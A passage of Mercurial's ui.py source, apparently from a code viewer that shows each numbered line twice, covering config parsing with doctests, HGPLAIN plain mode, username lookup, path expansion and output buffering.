575 b"ui", b"report_untrusted"
575 b"ui", b"report_untrusted"
576 )
576 )
577 self.showtimestamp = self.configbool(b'ui', b'timestamp-output')
577 self.showtimestamp = self.configbool(b'ui', b'timestamp-output')
578 self.tracebackflag = self.configbool(b'ui', b'traceback')
578 self.tracebackflag = self.configbool(b'ui', b'traceback')
579 self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')
579 self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')
580
580
581 if section in (None, b'trusted'):
581 if section in (None, b'trusted'):
582 # update trust information
582 # update trust information
583 self._trustusers.update(self.configlist(b'trusted', b'users'))
583 self._trustusers.update(self.configlist(b'trusted', b'users'))
584 self._trustgroups.update(self.configlist(b'trusted', b'groups'))
584 self._trustgroups.update(self.configlist(b'trusted', b'groups'))
585
585
586 if section in (None, b'devel', b'ui') and self.debugflag:
586 if section in (None, b'devel', b'ui') and self.debugflag:
587 tracked = set()
587 tracked = set()
588 if self.configbool(b'devel', b'debug.extensions'):
588 if self.configbool(b'devel', b'debug.extensions'):
589 tracked.add(b'extension')
589 tracked.add(b'extension')
590 if tracked:
590 if tracked:
591 logger = loggingutil.fileobjectlogger(self._ferr, tracked)
591 logger = loggingutil.fileobjectlogger(self._ferr, tracked)
592 self.setlogger(b'debug', logger)
592 self.setlogger(b'debug', logger)
593
593
594 def backupconfig(self, section, item):
594 def backupconfig(self, section, item):
595 return (
595 return (
596 self._ocfg.backup(section, item),
596 self._ocfg.backup(section, item),
597 self._tcfg.backup(section, item),
597 self._tcfg.backup(section, item),
598 self._ucfg.backup(section, item),
598 self._ucfg.backup(section, item),
599 )
599 )
600
600
601 def restoreconfig(self, data):
601 def restoreconfig(self, data):
602 self._ocfg.restore(data[0])
602 self._ocfg.restore(data[0])
603 self._tcfg.restore(data[1])
603 self._tcfg.restore(data[1])
604 self._ucfg.restore(data[2])
604 self._ucfg.restore(data[2])
605
605
606 def setconfig(self, section, name, value, source=b''):
606 def setconfig(self, section, name, value, source=b''):
607 for cfg in (self._ocfg, self._tcfg, self._ucfg):
607 for cfg in (self._ocfg, self._tcfg, self._ucfg):
608 cfg.set(section, name, value, source)
608 cfg.set(section, name, value, source)
609 self.fixconfig(section=section)
609 self.fixconfig(section=section)
610 self._maybetweakdefaults()
610 self._maybetweakdefaults()
611
611
612 def _data(self, untrusted):
612 def _data(self, untrusted):
613 return untrusted and self._ucfg or self._tcfg
613 return untrusted and self._ucfg or self._tcfg
614
614
615 def configsource(self, section, name, untrusted=False):
615 def configsource(self, section, name, untrusted=False):
616 return self._data(untrusted).source(section, name)
616 return self._data(untrusted).source(section, name)
617
617
618 def config(self, section, name, default=_unset, untrusted=False):
618 def config(self, section, name, default=_unset, untrusted=False):
619 """return the plain string version of a config"""
619 """return the plain string version of a config"""
620 value = self._config(
620 value = self._config(
621 section, name, default=default, untrusted=untrusted
621 section, name, default=default, untrusted=untrusted
622 )
622 )
623 if value is _unset:
623 if value is _unset:
624 return None
624 return None
625 return value
625 return value
626
626
627 def _config(self, section, name, default=_unset, untrusted=False):
627 def _config(self, section, name, default=_unset, untrusted=False):
628 value = itemdefault = default
628 value = itemdefault = default
629 item = self._knownconfig.get(section, {}).get(name)
629 item = self._knownconfig.get(section, {}).get(name)
630 alternates = [(section, name)]
630 alternates = [(section, name)]
631
631
632 if item is not None:
632 if item is not None:
633 alternates.extend(item.alias)
633 alternates.extend(item.alias)
634 if callable(item.default):
634 if callable(item.default):
635 itemdefault = item.default()
635 itemdefault = item.default()
636 else:
636 else:
637 itemdefault = item.default
637 itemdefault = item.default
638 else:
638 else:
639 msg = b"accessing unregistered config item: '%s.%s'"
639 msg = b"accessing unregistered config item: '%s.%s'"
640 msg %= (section, name)
640 msg %= (section, name)
641 self.develwarn(msg, 2, b'warn-config-unknown')
641 self.develwarn(msg, 2, b'warn-config-unknown')
642
642
643 if default is _unset:
643 if default is _unset:
644 if item is None:
644 if item is None:
645 value = default
645 value = default
646 elif item.default is configitems.dynamicdefault:
646 elif item.default is configitems.dynamicdefault:
647 value = None
647 value = None
648 msg = b"config item requires an explicit default value: '%s.%s'"
648 msg = b"config item requires an explicit default value: '%s.%s'"
649 msg %= (section, name)
649 msg %= (section, name)
650 self.develwarn(msg, 2, b'warn-config-default')
650 self.develwarn(msg, 2, b'warn-config-default')
651 else:
651 else:
652 value = itemdefault
652 value = itemdefault
653 elif (
653 elif (
654 item is not None
654 item is not None
655 and item.default is not configitems.dynamicdefault
655 and item.default is not configitems.dynamicdefault
656 and default != itemdefault
656 and default != itemdefault
657 ):
657 ):
658 msg = (
658 msg = (
659 b"specifying a mismatched default value for a registered "
659 b"specifying a mismatched default value for a registered "
660 b"config item: '%s.%s' '%s'"
660 b"config item: '%s.%s' '%s'"
661 )
661 )
662 msg %= (section, name, pycompat.bytestr(default))
662 msg %= (section, name, pycompat.bytestr(default))
663 self.develwarn(msg, 2, b'warn-config-default')
663 self.develwarn(msg, 2, b'warn-config-default')
664
664
665 candidates = []
665 candidates = []
666 config = self._data(untrusted)
666 config = self._data(untrusted)
667 for s, n in alternates:
667 for s, n in alternates:
668 candidate = config.get(s, n, None)
668 candidate = config.get(s, n, None)
669 if candidate is not None:
669 if candidate is not None:
670 candidates.append((s, n, candidate))
670 candidates.append((s, n, candidate))
671 if candidates:
671 if candidates:
672
672
673 def level(x):
673 def level(x):
674 return config.level(x[0], x[1])
674 return config.level(x[0], x[1])
675
675
676 value = max(candidates, key=level)[2]
676 value = max(candidates, key=level)[2]
677
677
678 if self.debugflag and not untrusted and self._reportuntrusted:
678 if self.debugflag and not untrusted and self._reportuntrusted:
679 for s, n in alternates:
679 for s, n in alternates:
680 uvalue = self._ucfg.get(s, n)
680 uvalue = self._ucfg.get(s, n)
681 if uvalue is not None and uvalue != value:
681 if uvalue is not None and uvalue != value:
682 self.debug(
682 self.debug(
683 b"ignoring untrusted configuration option "
683 b"ignoring untrusted configuration option "
684 b"%s.%s = %s\n" % (s, n, uvalue)
684 b"%s.%s = %s\n" % (s, n, uvalue)
685 )
685 )
686 return value
686 return value
687
687
688 def config_default(self, section, name):
688 def config_default(self, section, name):
689 """return the default value for a config option
689 """return the default value for a config option
690
690
691 The default is returned "raw", for example if it is a callable, the
691 The default is returned "raw", for example if it is a callable, the
692 callable was not called.
692 callable was not called.
693 """
693 """
694 item = self._knownconfig.get(section, {}).get(name)
694 item = self._knownconfig.get(section, {}).get(name)
695
695
696 if item is None:
696 if item is None:
697 raise KeyError((section, name))
697 raise KeyError((section, name))
698 return item.default
698 return item.default
699
699
700 def configsuboptions(self, section, name, default=_unset, untrusted=False):
700 def configsuboptions(self, section, name, default=_unset, untrusted=False):
701 """Get a config option and all sub-options.
701 """Get a config option and all sub-options.
702
702
703 Some config options have sub-options that are declared with the
703 Some config options have sub-options that are declared with the
704 format "key:opt = value". This method is used to return the main
704 format "key:opt = value". This method is used to return the main
705 option and all its declared sub-options.
705 option and all its declared sub-options.
706
706
707 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
707 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
708 is a dict of defined sub-options where keys and values are strings.
708 is a dict of defined sub-options where keys and values are strings.
709 """
709 """
710 main = self.config(section, name, default, untrusted=untrusted)
710 main = self.config(section, name, default, untrusted=untrusted)
711 data = self._data(untrusted)
711 data = self._data(untrusted)
712 sub = {}
712 sub = {}
713 prefix = b'%s:' % name
713 prefix = b'%s:' % name
714 for k, v in data.items(section):
714 for k, v in data.items(section):
715 if k.startswith(prefix):
715 if k.startswith(prefix):
716 sub[k[len(prefix) :]] = v
716 sub[k[len(prefix) :]] = v
717
717
718 if self.debugflag and not untrusted and self._reportuntrusted:
718 if self.debugflag and not untrusted and self._reportuntrusted:
719 for k, v in sub.items():
719 for k, v in sub.items():
720 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
720 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
721 if uvalue is not None and uvalue != v:
721 if uvalue is not None and uvalue != v:
722 self.debug(
722 self.debug(
723 b'ignoring untrusted configuration option '
723 b'ignoring untrusted configuration option '
724 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
724 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
725 )
725 )
726
726
727 return main, sub
727 return main, sub
728
728
729 def configpath(self, section, name, default=_unset, untrusted=False):
729 def configpath(self, section, name, default=_unset, untrusted=False):
730 """get a path config item, expanded relative to repo root or config
730 """get a path config item, expanded relative to repo root or config
731 file"""
731 file"""
732 v = self.config(section, name, default, untrusted)
732 v = self.config(section, name, default, untrusted)
733 if v is None:
733 if v is None:
734 return None
734 return None
735 if not os.path.isabs(v) or b"://" not in v:
735 if not os.path.isabs(v) or b"://" not in v:
736 src = self.configsource(section, name, untrusted)
736 src = self.configsource(section, name, untrusted)
737 if b':' in src:
737 if b':' in src:
738 base = os.path.dirname(src.rsplit(b':')[0])
738 base = os.path.dirname(src.rsplit(b':')[0])
739 v = os.path.join(base, os.path.expanduser(v))
739 v = os.path.join(base, os.path.expanduser(v))
740 return v
740 return v
741
741
742 def configbool(self, section, name, default=_unset, untrusted=False):
742 def configbool(self, section, name, default=_unset, untrusted=False):
743 """parse a configuration element as a boolean
743 """parse a configuration element as a boolean
744
744
745 >>> u = ui(); s = b'foo'
745 >>> u = ui(); s = b'foo'
746 >>> u.setconfig(s, b'true', b'yes')
746 >>> u.setconfig(s, b'true', b'yes')
747 >>> u.configbool(s, b'true')
747 >>> u.configbool(s, b'true')
748 True
748 True
749 >>> u.setconfig(s, b'false', b'no')
749 >>> u.setconfig(s, b'false', b'no')
750 >>> u.configbool(s, b'false')
750 >>> u.configbool(s, b'false')
751 False
751 False
752 >>> u.configbool(s, b'unknown')
752 >>> u.configbool(s, b'unknown')
753 False
753 False
754 >>> u.configbool(s, b'unknown', True)
754 >>> u.configbool(s, b'unknown', True)
755 True
755 True
756 >>> u.setconfig(s, b'invalid', b'somevalue')
756 >>> u.setconfig(s, b'invalid', b'somevalue')
757 >>> u.configbool(s, b'invalid')
757 >>> u.configbool(s, b'invalid')
758 Traceback (most recent call last):
758 Traceback (most recent call last):
759 ...
759 ...
760 ConfigError: foo.invalid is not a boolean ('somevalue')
760 ConfigError: foo.invalid is not a boolean ('somevalue')
761 """
761 """
762
762
763 v = self._config(section, name, default, untrusted=untrusted)
763 v = self._config(section, name, default, untrusted=untrusted)
764 if v is None:
764 if v is None:
765 return v
765 return v
766 if v is _unset:
766 if v is _unset:
767 if default is _unset:
767 if default is _unset:
768 return False
768 return False
769 return default
769 return default
770 if isinstance(v, bool):
770 if isinstance(v, bool):
771 return v
771 return v
772 b = stringutil.parsebool(v)
772 b = stringutil.parsebool(v)
773 if b is None:
773 if b is None:
774 raise error.ConfigError(
774 raise error.ConfigError(
775 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
775 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
776 )
776 )
777 return b
777 return b
778
778
779 def configwith(
779 def configwith(
780 self, convert, section, name, default=_unset, desc=None, untrusted=False
780 self, convert, section, name, default=_unset, desc=None, untrusted=False
781 ):
781 ):
782 """parse a configuration element with a conversion function
782 """parse a configuration element with a conversion function
783
783
784 >>> u = ui(); s = b'foo'
784 >>> u = ui(); s = b'foo'
785 >>> u.setconfig(s, b'float1', b'42')
785 >>> u.setconfig(s, b'float1', b'42')
786 >>> u.configwith(float, s, b'float1')
786 >>> u.configwith(float, s, b'float1')
787 42.0
787 42.0
788 >>> u.setconfig(s, b'float2', b'-4.25')
788 >>> u.setconfig(s, b'float2', b'-4.25')
789 >>> u.configwith(float, s, b'float2')
789 >>> u.configwith(float, s, b'float2')
790 -4.25
790 -4.25
791 >>> u.configwith(float, s, b'unknown', 7)
791 >>> u.configwith(float, s, b'unknown', 7)
792 7.0
792 7.0
793 >>> u.setconfig(s, b'invalid', b'somevalue')
793 >>> u.setconfig(s, b'invalid', b'somevalue')
794 >>> u.configwith(float, s, b'invalid')
794 >>> u.configwith(float, s, b'invalid')
795 Traceback (most recent call last):
795 Traceback (most recent call last):
796 ...
796 ...
797 ConfigError: foo.invalid is not a valid float ('somevalue')
797 ConfigError: foo.invalid is not a valid float ('somevalue')
798 >>> u.configwith(float, s, b'invalid', desc=b'womble')
798 >>> u.configwith(float, s, b'invalid', desc=b'womble')
799 Traceback (most recent call last):
799 Traceback (most recent call last):
800 ...
800 ...
801 ConfigError: foo.invalid is not a valid womble ('somevalue')
801 ConfigError: foo.invalid is not a valid womble ('somevalue')
802 """
802 """
803
803
804 v = self.config(section, name, default, untrusted)
804 v = self.config(section, name, default, untrusted)
805 if v is None:
805 if v is None:
806 return v # do not attempt to convert None
806 return v # do not attempt to convert None
807 try:
807 try:
808 return convert(v)
808 return convert(v)
809 except (ValueError, error.ParseError):
809 except (ValueError, error.ParseError):
810 if desc is None:
810 if desc is None:
811 desc = pycompat.sysbytes(convert.__name__)
811 desc = pycompat.sysbytes(convert.__name__)
812 raise error.ConfigError(
812 raise error.ConfigError(
813 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
813 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
814 )
814 )
815
815
816 def configint(self, section, name, default=_unset, untrusted=False):
816 def configint(self, section, name, default=_unset, untrusted=False):
817 """parse a configuration element as an integer
817 """parse a configuration element as an integer
818
818
819 >>> u = ui(); s = b'foo'
819 >>> u = ui(); s = b'foo'
820 >>> u.setconfig(s, b'int1', b'42')
820 >>> u.setconfig(s, b'int1', b'42')
821 >>> u.configint(s, b'int1')
821 >>> u.configint(s, b'int1')
822 42
822 42
823 >>> u.setconfig(s, b'int2', b'-42')
823 >>> u.setconfig(s, b'int2', b'-42')
824 >>> u.configint(s, b'int2')
824 >>> u.configint(s, b'int2')
825 -42
825 -42
826 >>> u.configint(s, b'unknown', 7)
826 >>> u.configint(s, b'unknown', 7)
827 7
827 7
828 >>> u.setconfig(s, b'invalid', b'somevalue')
828 >>> u.setconfig(s, b'invalid', b'somevalue')
829 >>> u.configint(s, b'invalid')
829 >>> u.configint(s, b'invalid')
830 Traceback (most recent call last):
830 Traceback (most recent call last):
831 ...
831 ...
832 ConfigError: foo.invalid is not a valid integer ('somevalue')
832 ConfigError: foo.invalid is not a valid integer ('somevalue')
833 """
833 """
834
834
835 return self.configwith(
835 return self.configwith(
836 int, section, name, default, b'integer', untrusted
836 int, section, name, default, b'integer', untrusted
837 )
837 )
838
838
839 def configbytes(self, section, name, default=_unset, untrusted=False):
839 def configbytes(self, section, name, default=_unset, untrusted=False):
840 """parse a configuration element as a quantity in bytes
840 """parse a configuration element as a quantity in bytes
841
841
842 Units can be specified as b (bytes), k or kb (kilobytes), m or
842 Units can be specified as b (bytes), k or kb (kilobytes), m or
843 mb (megabytes), g or gb (gigabytes).
843 mb (megabytes), g or gb (gigabytes).
844
844
845 >>> u = ui(); s = b'foo'
845 >>> u = ui(); s = b'foo'
846 >>> u.setconfig(s, b'val1', b'42')
846 >>> u.setconfig(s, b'val1', b'42')
847 >>> u.configbytes(s, b'val1')
847 >>> u.configbytes(s, b'val1')
848 42
848 42
849 >>> u.setconfig(s, b'val2', b'42.5 kb')
849 >>> u.setconfig(s, b'val2', b'42.5 kb')
850 >>> u.configbytes(s, b'val2')
850 >>> u.configbytes(s, b'val2')
851 43520
851 43520
852 >>> u.configbytes(s, b'unknown', b'7 MB')
852 >>> u.configbytes(s, b'unknown', b'7 MB')
853 7340032
853 7340032
854 >>> u.setconfig(s, b'invalid', b'somevalue')
854 >>> u.setconfig(s, b'invalid', b'somevalue')
855 >>> u.configbytes(s, b'invalid')
855 >>> u.configbytes(s, b'invalid')
856 Traceback (most recent call last):
856 Traceback (most recent call last):
857 ...
857 ...
858 ConfigError: foo.invalid is not a byte quantity ('somevalue')
858 ConfigError: foo.invalid is not a byte quantity ('somevalue')
859 """
859 """
860
860
861 value = self._config(section, name, default, untrusted)
861 value = self._config(section, name, default, untrusted)
862 if value is _unset:
862 if value is _unset:
863 if default is _unset:
863 if default is _unset:
864 default = 0
864 default = 0
865 value = default
865 value = default
866 if not isinstance(value, bytes):
866 if not isinstance(value, bytes):
867 return value
867 return value
868 try:
868 try:
869 return util.sizetoint(value)
869 return util.sizetoint(value)
870 except error.ParseError:
870 except error.ParseError:
871 raise error.ConfigError(
871 raise error.ConfigError(
872 _(b"%s.%s is not a byte quantity ('%s')")
872 _(b"%s.%s is not a byte quantity ('%s')")
873 % (section, name, value)
873 % (section, name, value)
874 )
874 )
875
875
876 def configlist(self, section, name, default=_unset, untrusted=False):
876 def configlist(self, section, name, default=_unset, untrusted=False):
877 """parse a configuration element as a list of comma/space separated
877 """parse a configuration element as a list of comma/space separated
878 strings
878 strings
879
879
880 >>> u = ui(); s = b'foo'
880 >>> u = ui(); s = b'foo'
881 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
881 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
882 >>> u.configlist(s, b'list1')
882 >>> u.configlist(s, b'list1')
883 ['this', 'is', 'a small', 'test']
883 ['this', 'is', 'a small', 'test']
884 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
884 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
885 >>> u.configlist(s, b'list2')
885 >>> u.configlist(s, b'list2')
886 ['this', 'is', 'a small', 'test']
886 ['this', 'is', 'a small', 'test']
887 """
887 """
888 # default is not always a list
888 # default is not always a list
889 v = self.configwith(
889 v = self.configwith(
890 config.parselist, section, name, default, b'list', untrusted
890 config.parselist, section, name, default, b'list', untrusted
891 )
891 )
892 if isinstance(v, bytes):
892 if isinstance(v, bytes):
893 return config.parselist(v)
893 return config.parselist(v)
894 elif v is None:
894 elif v is None:
895 return []
895 return []
896 return v
896 return v
897
897
898 def configdate(self, section, name, default=_unset, untrusted=False):
898 def configdate(self, section, name, default=_unset, untrusted=False):
899 """parse a configuration element as a tuple of ints
899 """parse a configuration element as a tuple of ints
900
900
901 >>> u = ui(); s = b'foo'
901 >>> u = ui(); s = b'foo'
902 >>> u.setconfig(s, b'date', b'0 0')
902 >>> u.setconfig(s, b'date', b'0 0')
903 >>> u.configdate(s, b'date')
903 >>> u.configdate(s, b'date')
904 (0, 0)
904 (0, 0)
905 """
905 """
906 if self.config(section, name, default, untrusted):
906 if self.config(section, name, default, untrusted):
907 return self.configwith(
907 return self.configwith(
908 dateutil.parsedate, section, name, default, b'date', untrusted
908 dateutil.parsedate, section, name, default, b'date', untrusted
909 )
909 )
910 if default is _unset:
910 if default is _unset:
911 return None
911 return None
912 return default
912 return default
913
913
914 def configdefault(self, section, name):
914 def configdefault(self, section, name):
915 """returns the default value of the config item"""
915 """returns the default value of the config item"""
916 item = self._knownconfig.get(section, {}).get(name)
916 item = self._knownconfig.get(section, {}).get(name)
917 itemdefault = None
917 itemdefault = None
918 if item is not None:
918 if item is not None:
919 if callable(item.default):
919 if callable(item.default):
920 itemdefault = item.default()
920 itemdefault = item.default()
921 else:
921 else:
922 itemdefault = item.default
922 itemdefault = item.default
923 return itemdefault
923 return itemdefault
924
924
925 def hasconfig(self, section, name, untrusted=False):
925 def hasconfig(self, section, name, untrusted=False):
926 return self._data(untrusted).hasitem(section, name)
926 return self._data(untrusted).hasitem(section, name)
927
927
928 def has_section(self, section, untrusted=False):
928 def has_section(self, section, untrusted=False):
929 '''tell whether section exists in config.'''
929 '''tell whether section exists in config.'''
930 return section in self._data(untrusted)
930 return section in self._data(untrusted)
931
931
932 def configitems(self, section, untrusted=False, ignoresub=False):
932 def configitems(self, section, untrusted=False, ignoresub=False):
933 items = self._data(untrusted).items(section)
933 items = self._data(untrusted).items(section)
934 if ignoresub:
934 if ignoresub:
935 items = [i for i in items if b':' not in i[0]]
935 items = [i for i in items if b':' not in i[0]]
936 if self.debugflag and not untrusted and self._reportuntrusted:
936 if self.debugflag and not untrusted and self._reportuntrusted:
937 for k, v in self._ucfg.items(section):
937 for k, v in self._ucfg.items(section):
938 if self._tcfg.get(section, k) != v:
938 if self._tcfg.get(section, k) != v:
939 self.debug(
939 self.debug(
940 b"ignoring untrusted configuration option "
940 b"ignoring untrusted configuration option "
941 b"%s.%s = %s\n" % (section, k, v)
941 b"%s.%s = %s\n" % (section, k, v)
942 )
942 )
943 return items
943 return items
944
944
945 def walkconfig(self, untrusted=False):
945 def walkconfig(self, untrusted=False):
946 cfg = self._data(untrusted)
946 cfg = self._data(untrusted)
947 for section in cfg.sections():
947 for section in cfg.sections():
948 for name, value in self.configitems(section, untrusted):
948 for name, value in self.configitems(section, untrusted):
949 yield section, name, value
949 yield section, name, value
950
950
951 def plain(self, feature=None):
951 def plain(self, feature=None):
952 """is plain mode active?
952 """is plain mode active?
953
953
954 Plain mode means that all configuration variables which affect
954 Plain mode means that all configuration variables which affect
955 the behavior and output of Mercurial should be
955 the behavior and output of Mercurial should be
956 ignored. Additionally, the output should be stable,
956 ignored. Additionally, the output should be stable,
957 reproducible and suitable for use in scripts or applications.
957 reproducible and suitable for use in scripts or applications.
958
958
959 The only way to trigger plain mode is by setting either the
959 The only way to trigger plain mode is by setting either the
960 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
960 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
961
961
962 The return value can either be
962 The return value can either be
963 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
963 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
964 - False if feature is disabled by default and not included in HGPLAIN
964 - False if feature is disabled by default and not included in HGPLAIN
965 - True otherwise
965 - True otherwise
966 """
966 """
967 if (
967 if (
968 b'HGPLAIN' not in encoding.environ
968 b'HGPLAIN' not in encoding.environ
969 and b'HGPLAINEXCEPT' not in encoding.environ
969 and b'HGPLAINEXCEPT' not in encoding.environ
970 ):
970 ):
971 return False
971 return False
972 exceptions = (
972 exceptions = (
973 encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
973 encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
974 )
974 )
975 # TODO: add support for HGPLAIN=+feature,-feature syntax
975 # TODO: add support for HGPLAIN=+feature,-feature syntax
976 if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
976 if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
977 b','
977 b','
978 ):
978 ):
979 exceptions.append(b'strictflags')
979 exceptions.append(b'strictflags')
980 if feature and exceptions:
980 if feature and exceptions:
981 return feature not in exceptions
981 return feature not in exceptions
982 return True
982 return True
983
983
984 def username(self, acceptempty=False):
984 def username(self, acceptempty=False):
985 """Return default username to be used in commits.
985 """Return default username to be used in commits.
986
986
987 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
987 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
988 and stop searching if one of these is set.
988 and stop searching if one of these is set.
989 If not found and acceptempty is True, returns None.
989 If not found and acceptempty is True, returns None.
990 If not found and ui.askusername is True, ask the user, else use
990 If not found and ui.askusername is True, ask the user, else use
991 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
991 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
992 If no username could be found, raise an Abort error.
992 If no username could be found, raise an Abort error.
993 """
993 """
994 user = encoding.environ.get(b"HGUSER")
994 user = encoding.environ.get(b"HGUSER")
995 if user is None:
995 if user is None:
996 user = self.config(b"ui", b"username")
996 user = self.config(b"ui", b"username")
997 if user is not None:
997 if user is not None:
998 user = os.path.expandvars(user)
998 user = os.path.expandvars(user)
999 if user is None:
999 if user is None:
1000 user = encoding.environ.get(b"EMAIL")
1000 user = encoding.environ.get(b"EMAIL")
1001 if user is None and acceptempty:
1001 if user is None and acceptempty:
1002 return user
1002 return user
1003 if user is None and self.configbool(b"ui", b"askusername"):
1003 if user is None and self.configbool(b"ui", b"askusername"):
1004 user = self.prompt(_(b"enter a commit username:"), default=None)
1004 user = self.prompt(_(b"enter a commit username:"), default=None)
1005 if user is None and not self.interactive():
1005 if user is None and not self.interactive():
1006 try:
1006 try:
1007 user = b'%s@%s' % (
1007 user = b'%s@%s' % (
1008 procutil.getuser(),
1008 procutil.getuser(),
1009 encoding.strtolocal(socket.getfqdn()),
1009 encoding.strtolocal(socket.getfqdn()),
1010 )
1010 )
1011 self.warn(_(b"no username found, using '%s' instead\n") % user)
1011 self.warn(_(b"no username found, using '%s' instead\n") % user)
1012 except KeyError:
1012 except KeyError:
1013 pass
1013 pass
1014 if not user:
1014 if not user:
1015 raise error.Abort(
1015 raise error.Abort(
1016 _(b'no username supplied'),
1016 _(b'no username supplied'),
1017 hint=_(b"use 'hg config --edit' " b'to set your username'),
1017 hint=_(b"use 'hg config --edit' " b'to set your username'),
1018 )
1018 )
1019 if b"\n" in user:
1019 if b"\n" in user:
1020 raise error.Abort(
1020 raise error.Abort(
1021 _(b"username %r contains a newline\n") % pycompat.bytestr(user)
1021 _(b"username %r contains a newline\n") % pycompat.bytestr(user)
1022 )
1022 )
1023 return user
1023 return user
1024
1024
1025 def shortuser(self, user):
1025 def shortuser(self, user):
1026 """Return a short representation of a user name or email address."""
1026 """Return a short representation of a user name or email address."""
1027 if not self.verbose:
1027 if not self.verbose:
1028 user = stringutil.shortuser(user)
1028 user = stringutil.shortuser(user)
1029 return user
1029 return user
1030
1030
1031 def expandpath(self, loc, default=None):
1031 def expandpath(self, loc, default=None):
1032 """Return repository location relative to cwd or from [paths]"""
1032 """Return repository location relative to cwd or from [paths]"""
1033 try:
1033 try:
1034 p = self.getpath(loc)
1034 p = self.getpath(loc)
1035 if p:
1035 if p:
1036 return p.rawloc
1036 return p.rawloc
1037 except error.RepoError:
1037 except error.RepoError:
1038 pass
1038 pass
1039
1039
1040 if default:
1040 if default:
1041 try:
1041 try:
1042 p = self.getpath(default)
1042 p = self.getpath(default)
1043 if p:
1043 if p:
1044 return p.rawloc
1044 return p.rawloc
1045 except error.RepoError:
1045 except error.RepoError:
1046 pass
1046 pass
1047
1047
1048 return loc
1048 return loc
1049
1049
1050 @util.propertycache
1050 @util.propertycache
1051 def paths(self):
1051 def paths(self):
1052 return paths(self)
1052 return paths(self)
1053
1053
1054 def getpath(self, *args, **kwargs):
1054 def getpath(self, *args, **kwargs):
1055 """see paths.getpath for details
1055 """see paths.getpath for details
1056
1056
1057 This method exist as `getpath` need a ui for potential warning message.
1057 This method exist as `getpath` need a ui for potential warning message.
1058 """
1058 """
1059 return self.paths.getpath(self, *args, **kwargs)
1059 return self.paths.getpath(self, *args, **kwargs)
1060
1060
1061 @property
1061 @property
1062 def fout(self):
1062 def fout(self):
1063 return self._fout
1063 return self._fout
1064
1064
1065 @fout.setter
1065 @fout.setter
1066 def fout(self, f):
1066 def fout(self, f):
1067 self._fout = f
1067 self._fout = f
1068 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1068 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1069
1069
1070 @property
1070 @property
1071 def ferr(self):
1071 def ferr(self):
1072 return self._ferr
1072 return self._ferr
1073
1073
1074 @ferr.setter
1074 @ferr.setter
1075 def ferr(self, f):
1075 def ferr(self, f):
1076 self._ferr = f
1076 self._ferr = f
1077 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1077 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1078
1078
1079 @property
1079 @property
1080 def fin(self):
1080 def fin(self):
1081 return self._fin
1081 return self._fin
1082
1082
1083 @fin.setter
1083 @fin.setter
1084 def fin(self, f):
1084 def fin(self, f):
1085 self._fin = f
1085 self._fin = f
1086
1086
1087 @property
1087 @property
1088 def fmsg(self):
1088 def fmsg(self):
1089 """Stream dedicated for status/error messages; may be None if
1089 """Stream dedicated for status/error messages; may be None if
1090 fout/ferr are used"""
1090 fout/ferr are used"""
1091 return self._fmsg
1091 return self._fmsg
1092
1092
1093 @fmsg.setter
1093 @fmsg.setter
1094 def fmsg(self, f):
1094 def fmsg(self, f):
1095 self._fmsg = f
1095 self._fmsg = f
1096 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1096 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1097
1097
1098 def pushbuffer(self, error=False, subproc=False, labeled=False):
1098 def pushbuffer(self, error=False, subproc=False, labeled=False):
1099 """install a buffer to capture standard output of the ui object
1099 """install a buffer to capture standard output of the ui object
1100
1100
1101 If error is True, the error output will be captured too.
1101 If error is True, the error output will be captured too.
1102
1102
1103 If subproc is True, output from subprocesses (typically hooks) will be
1103 If subproc is True, output from subprocesses (typically hooks) will be
1104 captured too.
1104 captured too.
1105
1105
1106 If labeled is True, any labels associated with buffered
1106 If labeled is True, any labels associated with buffered
1107 output will be handled. By default, this has no effect
1107 output will be handled. By default, this has no effect
1108 on the output returned, but extensions and GUI tools may
1108 on the output returned, but extensions and GUI tools may
1109 handle this argument and returned styled output. If output
1109 handle this argument and returned styled output. If output
1110 is being buffered so it can be captured and parsed or
1110 is being buffered so it can be captured and parsed or
1111 processed, labeled should not be set to True.
1111 processed, labeled should not be set to True.
1112 """
1112 """
1113 self._buffers.append([])
1113 self._buffers.append([])
1114 self._bufferstates.append((error, subproc, labeled))
1114 self._bufferstates.append((error, subproc, labeled))
1115 self._bufferapplylabels = labeled
1115 self._bufferapplylabels = labeled
1116
1116
1117 def popbuffer(self):
1117 def popbuffer(self):
1118 '''pop the last buffer and return the buffered output'''
1118 '''pop the last buffer and return the buffered output'''
1119 self._bufferstates.pop()
1119 self._bufferstates.pop()
1120 if self._bufferstates:
1120 if self._bufferstates:
1121 self._bufferapplylabels = self._bufferstates[-1][2]
1121 self._bufferapplylabels = self._bufferstates[-1][2]
1122 else:
1122 else:
1123 self._bufferapplylabels = None
1123 self._bufferapplylabels = None
1124
1124
